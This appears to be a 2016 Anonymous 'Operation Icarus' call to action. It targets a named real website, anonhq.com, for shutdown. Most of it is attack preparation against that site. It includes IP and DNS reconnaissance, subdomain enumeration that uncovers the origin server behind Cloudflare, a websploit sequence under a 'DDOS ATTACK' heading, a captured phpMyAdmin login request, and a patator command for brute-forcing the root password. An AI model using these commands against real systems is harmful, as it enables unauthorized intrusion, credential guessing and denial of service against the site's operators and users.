Anonymous [German] Operation Icarus | Round 2 | 2016


We are Anonymous.
We stand united against the greedy bankers.

► Information, progress and updates:
https://www.facebook.com/events/96415…

► Group:
https://www.facebook.com/groups/11142…

► Million Mask March Deutschland:
https://www.facebook.com/events/17399…

► Data for this operation:
http://pastebin.com/K0aMQC6N

► First message:
https://www.youtube.com/watch?v=7Yqwb…


✶ Anonymous Deutschland LEGION Facebook:
https://goo.gl/EJk4KQ

✶ Anonymous Deutschland LEGION YouTube:
https://goo.gl/77qhUc

✶ Million Mask March Deutschland:
https://goo.gl/gZKi0R


 

Data for Operation Icarus:

» AnonHQ is NOT Anonymous! «

 

OpShutDownAnonHQ

http://anonhq.com/

IP address 104.20.42.159 (Cloudflare)

IPv6 address 2400:cb00:2048:1:0:0:6814:2a9f

CloudFlare, Inc. 101 Townsend Street San Francisco CA US 94107 104.20.43.159 Linux cloudflare-nginx 15-Apr-2016

CloudFlare, Inc. 101 Townsend Street San Francisco CA US 94107 104.20.42.159 Linux cloudflare-nginx 14-Apr-2016

http://mail.anonhq.com/

http://anonhq.com/xmlrpc.php

Nameserver cass.ns.cloudflare.com

DNS admin dns@cloudflare.com

Reverse DNS mail.anonhq.com

Nameserver organisation whois.cloudflare.com

Domain registrar godaddy.com

anonhq.com ip is 104.20.42.159
mail.anonhq.com ip is 149.202.58.162
www.anonhq.com ip is 104.20.42.159

https://104.20.42.159:8443/
https://104.20.42.159:443/

ip4 149.202.58.162

a mail.anonhq.com

Enter target domain: anonhq

— Testing common subdomains for misconfiguration —
[x] direct.anonhq is hosted at 31.199.53.10
[x] forum.anonhq is hosted at 31.199.53.10
[x] mail.anonhq is hosted at 31.199.53.10
[x] portal.anonhq is hosted at 31.199.53.10
[x] imap.anonhq is hosted at 31.199.53.10
[x] direct-connect.anonhq is hosted at 31.199.53.10
[x] beta.anonhq is hosted at 31.199.53.10
[x] webmail.anonhq is hosted at 31.199.53.10
[x] pop.anonhq is hosted at 31.199.53.10
[x] cpanel.anonhq is hosted at 31.199.53.10
[x] ftp.anonhq is hosted at 31.199.53.10
[x] admin.anonhq is hosted at 31.199.53.10

— Testing common tlds —
[x] anonhq.com is hosted at 104.20.42.159
[x] anonhq.com is hosted at 104.20.43.159
[x] anonhq.com is hosted at 2400:cb00:2048:1::6814:2b9f
[x] anonhq.com is hosted at 2400:cb00:2048:1::6814:2a9f
[x] anonhq.net is hosted at 98.124.243.49
[x] anonhq.info is hosted at 31.199.53.10
[x] anonhq.org is hosted at 50.63.202.45
[x] anonhq.biz is hosted at 31.199.53.10
[x] anonhq.cc is hosted at 31.199.53.10
[x] anonhq.ru is hosted at 31.199.53.10
[x] anonhq.co.uk is hosted at 31.199.53.10
[x] anonhq.us is hosted at 31.199.53.10
[x] anonhq.su is hosted at 31.199.53.10

CloudFlare IP Ranges

Some applications or host providers might find it handy to know about CloudFlare’s IPs.
This page is intended to be the definitive source of CloudFlare’s current IP ranges.

DDOS ATTACK CLOUDFARE

websploit

show modules

use web/cloudfare_resolver

show options

set TARGET 149.202.58.162

run

nslookup www.anonhq.com

check subdomains

nslookup ftp.anonhq.com
nslookup mail.anonhq.com

https://149.202.58.162/mail/

http://anonhq.com/

┌─[root@parrot]─[~/Desktop]
└──╼ #dnsmap
dnsmap 0.30 – DNS Network Mapper by pagvac (gnucitizen.org)

usage: dnsmap <target-domain> [options]
options:
-w <wordlist-file>
-r <regular-results-file>
-c <csv-results-file>
-d <delay-millisecs>
-i <ips-to-ignore> (useful if you’re obtaining false positives)

e.g.:
dnsmap target-domain.foo
dnsmap target-domain.foo -w yourwordlist.txt -r /tmp/domainbf_results.txt
dnsmap target-fomain.foo -r /tmp/ -d 3000
dnsmap target-fomain.foo -r ./domainbf_results.txt

┌─[✗]─[root@parrot]─[~/Desktop]
└──╼ #dnsmap anonhq.com
dnsmap 0.30 – DNS Network Mapper by pagvac (gnucitizen.org)

[+] searching (sub)domains for anonhq.com using built-in wordlist
[+] using maximum random delay of 10 millisecond(s) between requests

mail.anonhq.com
IP address #1: 149.202.58.162

www.anonhq.com
IPv6 address #1: 2400:cb00:2048:1::6814:2b9f
IPv6 address #2: 2400:cb00:2048:1::6814:2a9f

www.anonhq.com
IP address #1: 104.20.42.159
IP address #2: 104.20.43.159

[+] 3 (sub)domains and 5 IP address(es) found
[+] completion time: 262 second(s)
┌─[root@parrot]─[~/Desktop]
└──╼ #

http://www.w3db.xyz/search/anonhq.com

http://webstatvalue.com/anonhq.com

http://www.capefeargatorclub.com/anonhq.com

Domain Nameserver Information

Host | IP Address | Country
cass.ns.cloudflare.com | 173.245.58.81 | United States
hal.ns.cloudflare.com | 173.245.59.174 | United States

DNS Record Analysis

Host | Type | TTL | Extra
anonhq.com | A | 300 | IP: 104.20.43.159
anonhq.com | A | 300 | IP: 104.20.42.159
anonhq.com | NS | 86400 | Target: hal.ns.cloudflare.com
anonhq.com | NS | 86400 | Target: cass.ns.cloudflare.com
anonhq.com | SOA | 86400 | MNAME: cass.ns.cloudflare.com, RNAME: dns.cloudflare.com
anonhq.com | MX | 300 | Priority: 10, Target: mail.anonhq.com
anonhq.com | TXT | 300 | TXT: v=spf1 a mx ip4:149.202.58.162 a:mail.anonhq.com ~all
anonhq.com | AAAA | 300 | IPV6: 2400:cb00:2048:1::6814:2a9f
anonhq.com | AAAA | 300 | IPV6: 2400:cb00:2048:1::6814:2b9f

http://149.202.58.162/phpmyadmin/index.php

POST /phpmyadmin/index.php HTTP/1.1Host: 149.202.58.162User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1Accept: text/html,application/xhtml

+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Referer:http://149.202.58.162/phpmyadmin/index.phpCookie: pma_lang=en;

pma_collation_connection=utf8_unicode_ci; phpMyAdmin=gv7h76p03der2id40bme52i7u1q1vbo4Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length:

101pma_username=root&pma_password=admin&server=1&target=index.php&token=d1f7c1b6a6d747dd3d1de50f161de94e

URL: http://149.202.58.162/phpmyadmin/

patator http_fuzz url=http://149.202.58.162/phpmyadmin/index.php method=POST body=’pma_username=root&pma_password=FILE0&server=1&lang=en‘ 0=/root/Desktop/wordslist/predator.txt follow=1 accept_cookie=1 -x ignore:fgrep=’Cannot log in to the MySQL server‘
